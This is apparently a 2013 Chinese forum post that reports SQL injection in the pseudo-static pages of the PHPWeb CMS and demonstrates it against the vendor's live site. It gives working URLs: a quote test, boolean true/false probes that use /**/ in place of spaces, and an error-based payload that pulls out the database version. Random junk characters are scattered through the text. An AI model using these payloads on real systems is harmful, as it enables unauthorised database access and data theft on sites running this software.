phpweb所有的整站程序伪静态页面都存在sql注入7 `0 G }+ j* p" W. }9 M9 K
6 Y* T9 L& n; D+ C8 U+ w主站:http://phpweb.net/
( h" S" \6 j+ o3 q H加’检测:* m, d7 E+ z/ c3 G4 |
1 {1 ~/ b3 Z8 }http://www.phpweb.net/down/html/?772′.html: q9 F% r7 e4 d) V
( C# W, q. C& b" q
出错
8 o% h. ], P- ~8 E" C存在注入。
, b+ F0 s Z0 d) S不能用空格,只能用/*罗
+ W' W$ C7 o( Q* ?' B2 } m, ~http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
$ G# |0 {6 n% h$ ]" I# t
, e: L+ A- ]0 K& X0 a" J& _http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.: ]' A }' e/ z( u8 @
爆数据库版本:" O, r) `5 P6 p0 V
: m6 F1 M/ N0 Q/ i ]! `! @?# y, K R6 F. {, I/ [" e
12 T7 N$ A3 d3 P+ ]
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html- i6 r: e+ A7 Q8 `# z( T4 |) U$ y" A
更新日期: 2013-01-03 13:39:50
* f( x' M2 h6 t0 j |
发表于 2013-1-4 19:46:42
收藏
支持
反对